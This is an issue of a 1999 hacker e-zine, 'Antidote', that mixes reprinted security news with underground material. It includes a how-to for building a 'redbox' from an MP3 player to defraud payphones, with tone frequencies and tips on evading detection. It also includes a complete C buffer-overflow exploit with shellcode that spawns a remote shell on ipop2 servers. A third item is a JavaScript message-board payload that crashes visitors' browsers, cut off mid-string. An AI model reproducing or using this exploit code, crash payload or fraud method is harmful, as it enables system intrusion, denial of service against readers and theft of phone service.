Copy Link
Add to Bookmark
Report
Antidote Vol. 02 Issue 10
Volume 2 Issue 10
6/28/99
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
** http://www.thepoison.org/antidote
bof_ptr = (long *)buffer;
for (i = 0; i < bufsize - 4; i += 4)
*(bof_ptr++) = get_sp() - offs;
printf ("Creating termcap f1le\n");
printf ("b1tch is Fe3lyn 1t.\n";
------------------------------
In this issue of Antidote, we have over 690 subscribers and getting more everyday! The
only thing that we ask of you when you read Antidote, is that you go to:
www.thepoison.org/popup.html
and click on our sponsors. One issue of Antidote takes us about a week to put together
and going to our sponsor only takes you about 15 seconds (if that). So please go visit
our sponsor because it is the only thing we ask of you.
--=\\Contents\\=--
0.0 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Authors
0.04 - Shouts
0.05 - Writing
1.00 - News
1.01 - Rio RedBox
1.02 - MicroScared goes Ape Shit for Privacy
1.03 - Crypto bill Passed
1.04 - Hacked site Alleges Media Conspiracy
1.05 - Congress Warned of Hacker Threats
1.06 - GSA launches intrusion-detection net
2.00 - Exploits (new & older)
2.01 - subipop2d.c.txt
2.02 - wwwboard.bof.txt
2.03 - all-root.c.txt
3.00 - Misc
3.01 - Neophyte Vocab
SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just
plane making fun of something or someone.
FEAT.S - FEATURED SITES:
www.thepoison.org/hosting
www.403-security.org
www.hackernews.com
------------------------------
**************************************************
________________________________________________
| ___ ___ __ __ |
| | | |.-----.-----.| |_|__|.-----.-----. |
| | || _ |__ --|| _| || | _ | |
| |___|___||_____|_____||____|__||__|__|___ | |
| http://www.thepoison.org/hosting |_____| |
| |
| Low affordable pricing starting at $10! |
|________________________________________________|
**************************************************
<!-- 0.00 - Beginning //-->
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to
teach you how to hack or anything, but we will supply you with the current information
and exploits. Mainly Antidote is just a magazine for people to read if they have some
extra time on there hands and are bored with nothing to do. If you want to read a maga-
zine that teaches you how to hack etc, then you might want to go to your local book-
store and see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics,
why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are recieved second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will recieve a link to the current Antidote (where you
can view it).
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like
to be published above your article (when sending it to us) and we will do what you
say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you
might want to send it again because we probably didn't get it (we respond to all e-
mails no matter what). We might use your article in future issues off Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it
or not.
Well thats it for our FAQ. If you have a question that is not on here or the question
is on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.
------------------------------
0.03 --=\\Authors\\=--
Lord Oak is the founder and current president of Antidote. Most work is done by him.
Please feel free to e-mail him at: lordoak@thepoison.org
Duece is the co-founder and co-president of Antidote, some work is done by him when
he comes online. Feel free to e-mail him at: duece@thepoison.org
ox1dation not really an author, just someone that helps us out a lot and we consider
him as an author! His e-mail address is: ox1dation@thepoison.org
------------------------------
0.04 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals
and Some are groups in general. If you are not on this list and you feel that For some
reason you should be, then please contact Lord Oak and he will post you on here and we
are sorry for the Misunderstanding. Well, here are the shout outs:
Lord Oak EazyMoney
Duece opt1mus
oX1dation PBBSER
Forlorn Retribution
0dnek www.thepoison.org
Like we said above, if we forgot you and/or you think you should be added, please e-
mail lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.05 --=\\Writing\\=--
As many of you know, we are always open to articles/submittings. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we recieve two e-mails with the same topic/idea then we will use the one
that we recieved first. So it might be a good idea to e-mail one of us and ask us if
someone has written about/on this topic so that way you don't waste your time on
writing something that won't be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on
thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if
we like it).
------------------------------
_________________________________
) ___ (
( //___/ / // ) ) // ) ) )
) /____ / // / / __ / / (
( / / // / / ) ) )
) / / ((___/ / ((___/ / (
( http://www.403-security.org )
) For the latest hacks and news (
(___________________________________)
<!-- 1.00 - News //-->
1.01 --=\\RIO Redbox\\=--
The construction, possession, and/or operation of this device may be a
criminal offence. Don't do it. This information is presented because it
is common and readily available.
This article is based on a Canadian Perspective, with some US info, but
the procedures are Canadian.
Purpose:
If you are one of the MP3 lovers out there that own a Diamond RIO (gotta
love these things), you can easily convert them to a nice Redbox for free
calls and as a replacement for that damned annoying HOLD MUSIC!
How-to:
1. Get a hold of a Diamond RIO PMP300, easy enough if you've got the money.
(They ain't cheap, but they are worth it just for the mp3 part.)
2. Get the tones. In Canada you need to generate Canadian N-ACTS tones, and
in the US you need to use American ACTS tones. Use a program like Cool
Edit (http://www.syntrillium.com) to generate the tones. Here are the
tones you need to make:
N-ACTS (Canadian):
Nickel - 2200hz 0.06s on
Dime - 2200hz 0.06s on, 0.06s off, twice repeating
Quarter - 2200hz 33ms on, 33ms off, 5 times repeating
ACTS (American):
Nickel - 1700+2200hz 0.060s on
Dime - 1700+2200hz 0.060s on, 0.060s off, twice repeating
Quarter - 1700+2200hz 33ms on, 33ms off, 5 times repeating
(5 times, as in "on, off, on, off, on, off, on, off, on")
3. Convert the tones to Mp3's. At this time, the most lean and clean program
I've found is the FhG Mpeg Layer-3 Producer from Opticom
(http://www.opticom.de/) it allows you to encode any Windows PCM wav file.
Encode the tones at the highest rate you can, usually 128kBits/s and
44,100Hz Stereo. This limits any distortion that the encoding may cause
(anything lower and the tones are useless). They take
less than a second to encode on a decent processor.
4. Load the RIO. Use whatever software you use to load your RIO up. Make sure
you remember which track was which coin.
5. Outputting the tones. This is pretty much open for you to do yourselves.
You just need a speaker with a high enough fidelity and a decent output.
A prefab speaker from radio shack can work, or you can modify a PC speaker
or something with a Mini-din connector to hook into the RIO. The choice is
up to you. I found that a prefab, 2", battery amplified portable speaker
works quite well, and doesn't look to conspicuous if you're searched. Just
a jumble of wires and speakers McGyvered together.
6. Using your Rio Redbox.
Long distance
1. Dial a long distance number.
2. You will be connected with an electronic or human operator telling you
how much money to deposit. Insert $.05, Hold the RIOBox speaker up to
the phones mouthpiece and play the required number of tones. Don't be
afraid of putting in a few cents worth extra, redboxing doesn't need
exact change.
3. When more money is required play more tones into the mouthpiece.
Local Calls
1. Dial information or an operator and ask them to place your call for
you. If they ask why, come up with a unique excuse.
2. She will ask for money. Insert 5 cents first and then use your RIOBox.
This prevents the operator from "seeing" that you are using a RIOBox.
This may or may not be necessary. Experiment.
International Calls
1. Dial an international phone number.
2. An operator will ask for money. Insert 5 cents first and then use your
RIOBox. This prevents the operator from "seeing" that you are using a
RIOBox. This may or may not be necessary. Experiment.
3. When more money is required play more tones into the mouthpiece.
Notes and suggestions:
A suggestion is to insert a second of silence before and after the tone so
you have time to hit the stop button so the RIO doesn't blow through all the
tones in 2 seconds. This also gives you a chance to randomize the "coins"
your inserting, so as not to alert any powers that be.
Another would be to pickup a small 2-4 Meg smartmedia card for storing these.
That way you can keep the tones hidden, but easily accessible. Plus the card
can be destroyed quickly in case of trouble and you'll be left with a nice
(legal) RIO.
You may also want to mix (with random time between coins) preset amounts,
like $2.50 or $3.95 and have them on a separate track for convenience sake,
especially if you know before hand how much it's gonna cost.
For more info on redboxing in Canada, check out cyb0rg/asm's article
@ www.hackcanada.com, much of this article was "borrowed" from his article.
Copyright (c) 1999 RenderMan
http://www.hackcanada.com
------------------------------
1.02 --=\\MicroScared goes Ape Shit for Privacy\\=--
[www.techserver.com]
Microsoft Corp., the largest advertiser on the Internet, has decided it will not buy
ads next year on Web sites that fail to publish adequate privacy promises to consumers.
The announcement comes less than three months after a similar decision by IBM, the
Web's second-largest advertiser.
The actions by the two companies come as the Federal Trade Commission prepares its
recommendations to Congress on whether tough new federal privacy laws are needed to
protect consumers online.
The Microsoft announcement to be made Wednesday was expected at a computer conference
in New York and will take effect after the end of the year. Microsoft said it spent
about $30 million last year on Web ads - but that's still a small portion of the $2
billion spent last year on Web advertising, according to the Internet Advertising Bur-
eau.
Microsoft, which has lobbied with other industry groups against privacy laws legisla-
tion, earlier this year began offering a free digital tool kit that promises to allow
consumers to use next-generation software to restrict what personal details Web sites
collect about them.
Consumers typically must manually find a company's online privacy statement, if one
exists, and read through legalese to determine what personal information a Web site
might be harvesting, such as their name, e-mail address or even favorite authors or
clothing sizes.
Last month, an industry-financed study showed businesses have made dramatic improve-
ments since last year in warning people how companies use personal information collec-
ted about them.
Nearly two-thirds of commercial Internet sites displayed at least some warning that
businesses were collecting personal details from visitors, such as names, postal and e-
mail addresses, and even shopping tastes, the study found. But less than 10 percent of
those sites had what experts consider comprehensive privacy policies.
A similar study last summer by the FTC found only 14 percent of sites warned how
companies used private information they collected about customers.
http://www.techserver.com/story/body/0,1634,62850-99839-710835-0,00.html
------------------------------
1.03 --=\\Crypto bill Passed\\=--
[www.wired.com]
A bill to relax strict US export limits on computer data-scrambling technology moved
ahead in the Senate Wednesday, but still faces several hurdles, including White House
opposition.
The Senate Commerce Committee's approval of S798, the Promote Reliable On-Line Tran-
sactions to Encourage Commerce and Trade Act (PROTECT), marked a victory for technology
companies. The panel favored a far more restrictive approach two years ago, but revers-
ed course after a powerful lobbying campaign by the industry.
Scrambling or encryption technology, which is included in everything from cable tele-
vision control boxes to email and Web browsing software, has become a critical means of
securing global communications and electronic commerce over the Internet.
http://www.wired.com/news/news/politics/story/20383.html
------------------------------
1.04 --=\\Hacked site Alleges Media Conspiracy\\=--
[www.7am.com]
Although repaired and back online within just a few short hours, the Thanks-CGI website
appears to have been hit a second time by the "Hackers In Paradise" group.
This time the group appear happy to have simply changed the scrolling javascript banner
at the bottom of the page to read "HiP Welcomes you to THANKS-CGI.... We're trying to
make your site more secure for the world!"
The operator of the website has told 7am.com that they are currently testing for holes
in their CGI scripts. They have suggested that the security hole may not be the fault
of their scripts -- rather that it could have been a "misconfiguration between cgi
script and the server."
7am.com discovered the hack while researching another story on CGI resources and
contacted the site's operator by email immediately the problem was noticed. However,
the operator of the Thanks-CGI site has suggested that because "the arrival of your e-
mail was paced so closely with the occurence [sic] of the hackage ... we have strong
reason to believe there might be a relationship between 7am.com and the hacker who
hacked our site."
http://7am.com/cgi-bin/twires.cgi?1000_t99062202.htm
------------------------------
1.05 --=\\Congress warned of hacker threats\\=--
[www.usatoday.com]
Government Web sites and computer networks are increasingly vulnerable to "cyber
attacks'' because they lack trained personnel and don't follow security plans, federal
officials warned a congressional committee Thursday.
Few people have adequate training to defend government Web sites, and those who do
seldom work in government for long, three panelists told the House Science Committee's
subcommittee on technology.
The security agencies "train people at government expense and the private sector waves
a bigger paycheck and takes them away,'' said Keith Rhodes, technical director with the
General Accounting Office.
In addition, government security experts often find their advice isn't followed, said
Raymond Kammer, director of the National Institutes for Standards and Technology, which
recommends security measures for federal computers.
"It is imperative that federal agencies implement vigorous security programs,'' Rhodes
said.
Hacker attacks like the recent defacing of the Senate Web site are well documented, but
information about attempts to access sensitive intelligence information is "very
sketchy,'' said Michael Jacobs, a deputy director of the National Security Agency.
Hackers are often nearly impossible to trace unless they boast of their actions.
In the most common type of attack, hackers overwhelm Web sites with a flood of requests
for information, causing the site to slow or shut down. Hackers can also redirect
visitors to a fake Web site that appears to be the official site, as happened earlier
this month to the Senate site.
"We are clearly seeing an escalation in both the destructive nature and aggressive pace
of these and other attacks,'' Jacobs said.
http://www.usatoday.com/life/cyber/tech/ctf465.htm
------------------------------
1.06 --=\\GSA launches intrusion-detection net\\=--
[www.fcw.com]
The General Services Administration last week asked industry for information about
emerging security technology for detecting unauthorized users on agency networks, with
the goal of building a government intrusion-detection system by the end of next year.
In building the Federal Intrusion Detection Network (Fidnet), GSA hopes to find security
tools vendors are developing that overcome the weaknesses of existing technology. By
keeping ahead of the latest technology, GSA hopes to leave agency defenses less vulner-
able to hackers, agency officials said.
"We want to encourage people to develop new technologies that will help us keep neck and
neck with the perpetrator," said David Jarrell, program manager for the GSA portion of
Fidnet in the Federal Technology Service's Office of Information Security and technical
director of the Federal Computer Incident Response Capability.
OIS will look not only to established intrusion-detection vendors but to new companies
and people that "we haven't even heard of," Jarrell said.
"I think there are people out there that are significantly brilliant enough to solve
this and we hope that this [request for information] will cause them to come forward,"
he said.
GSA plans to use the vendor-provided information to develop prototypes by the first
quarter of fiscal 2000, said Tom Burke, GSA's assistant commissioner of information
security. Down the line, OIS may even pay some of the vendors to put together a long-
term, real-world demonstration of their capabilities at an agency, he said.
GSA particularly is interested in finding intrusion-detection systems that are more
capable of detecting attacks as they happen instead of after the fact.
The problem is that most intrusion-detection solutions work the same way anti-virus
protection does: They check network-use patterns against a known list of intrusion
"signatures" and send out alerts when they come across a match.
But as vendors and users have known for years, this method will not catch intrusions
that are not on that list. Also, most products just now are advancing to the point where
they alert administrators at the time an intrusion takes place.
"We find that many of the off-the-shelf products that are available today are really a
response to the intrusions, and they are always a step behind the intruder," Jarrell
said. "We want to look to the future and some artificial intelligence that will learn as
it goes about the attacks that are being launched."
This type of capability would be more than welcome to agencies, especially if they are
enabled to respond more quickly at the local level, said one senior civilian agency
official.
Others recognized the potential benefits of sharing attack "experience" across govern-
ment.
"What I would hope this next-generation intrusion detection could bring to us is the
capability not only to monitor [intrusions] but to put together the information in a
history for reference," said Sarah Jane League, Defense Department liaison at the Crit-
ical Infrastructure Assurance Office. "It should bring that pattern recognition and
learn as it goes...so that over time it will have the ability to recognize" not only
attacks but what could be attacks, she said.
Vendors have been working on this type of product, sometimes called anomaly detection,
for some time.
"ISS has a lot of research efforts in place to advance the intrusion-detection market,"
said Mark Wood, intrusion-detection product manager at Internet Security Systems Inc.,
maker of the Real-Secure intrusion-detection product line. "Having a pre-defined list of
signatures is nice, but you'd like to detect novel attacks, things you don't know
about."
One major problem vendors are struggling with in producing this type of solution is the
large number of "false positives" -- incorrectly perceived attacks -- that are generated
when a network is scanned, Wood said. Despite this, a commercially viable solution could
be available within the next year, he said.
"It's certainly worthwhile that someone like the GSA is driving this; it's absolutely
necessary," Wood said. "Perhaps this will help coordinate the industry so that they will
provide something sooner than they would have."
The need for this type of solution across government has been underscored by the more
than 40 federal World Wide Web sites that have been hacked in the last two months, in-
cluding at least six last week. And these attacks are only the most noticeable types of
intrusions into government networks, according to federal experts testifying before
Congress last week [see related story, "House member suggests regular network security
reports"].
However, in the end, while many would wish otherwise, keeping up with attackers instead
of one step behind really is the best that anyone can do, Jarrell said. "There is no
silver bullet; there is no perfect solution when it comes to intrusion detection," he
said. "As I've said before, if you build a better mousetrap, a better mouse will
evolve."
http://www.fcw.com/pubs/fcw/1999/0628/fcw-newsintrusion-6-28-99.html
------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/usr/bin/perl
# Lord Oak's famous Perl script. #
# minor configuring is needed! #
##################################
# path to the frequently asked questions....
$faq = "/home/username/faq.html";
##### Do not edit anything else! #####
print "Content-type: text/html\n\n";
open(FAQ,"<$faq");
print FAQ "Question: who runs this place?\n";
print FAQ "<BR>\n";
print FAQ "Answer: Donno, but Lord Oak 0wnz it\n";
close (FAQ);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
<!-- 2.00 - Exploits //-->
2.01 --=\\subipop2d.c.txt\\=--
/*
* subipop2d.c (c) 1999 Subterrain Security
*
* Written by bind - June 18, 1999
*
* Vulnerable: ipop2 daemons shipped with the imap-4.4 package
* Compromise: remote users can spawn a shell as user "nobody
*
* Greets: vacuum, xdr & cripto...
*
* Usage:
* ./subipop2 <auth> <user> <pass> [offset] [alignment] [timeout]
*
* Try offsets -500...500, alignment option should be between 0 and 3
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define RET 0xbffff718
#define NOP 0x90
#define WAIT 20
char shellcode[] = /* shellcode "borrowed" from plaguez's imapx.c */
"\xeb\x38\x5e\x89\xf3\x89\xd8\x80\x46\x01\x20\x80\x46\x02\x20\x80"
"\x46\x03\x20\x80\x46\x05\x20\x80\x46\x06\x20\x89\xf7\x83\xc7\x07"
"\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc3\xff\xff\xff\x2f"
"\x42\x49\x4e\x2f\x53\x48\x00";
int main (int argc, char **argv)
{
char buf[1002], *auth, *user, *pass;
int i, offset = 0, align = 0, timeout = WAIT;
unsigned long addr;
if (argc < 4)
{
printf ("usage: %s <auth> <user> <password> [offset] [alignment]"
" [timeout]\n",
argv[0]);
exit (1);
}
auth = argv[1];
user = argv[2];
pass = argv[3];
if (argc > 4) offset = atoi (argv[4]);
if (argc > 5) align = atoi (argv[5]);
if (argc > 6) timeout = atoi (argv[6]);
addr = RET - offset;
memset (buf, NOP, 1002);
memcpy (buf + 500, shellcode, strlen (shellcode));
for (i = (strlen (shellcode) + (600 + align)); i <= 1002; i += 4)
*(long *) &buf[i] = addr;
sleep (2);
printf ("HELO %s:%s %s\n", auth, user, pass);
sleep (timeout);
printf ("FOLD %s\n", buf);
}
------------------------------
2.02 --=\\wwwboard.bof.txt\\=--
As we all know, there are many problems with Matt Wrights wwwboard
(www.worldwidemart.com/scripts). Even though there are many errors in it, it is still
one of the most commonly used boards today. I have found yet another glitch with his
wwwboard. What it will do is kick someone that veiws your message off of Internet
Explorer 4.0+. I will take no credit in the JavaScript writing because i did not write
it, i just discovered that it could be used with his board.
Input this in the message area:
<HTML>
<body bgcolor=#0000000>
<font size=-1 color=#c0c0c0><center>
Kicking.............</center>
</font>
<SCRIPT LANGUAGE="JAVASCRIPT">
var p=
external.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 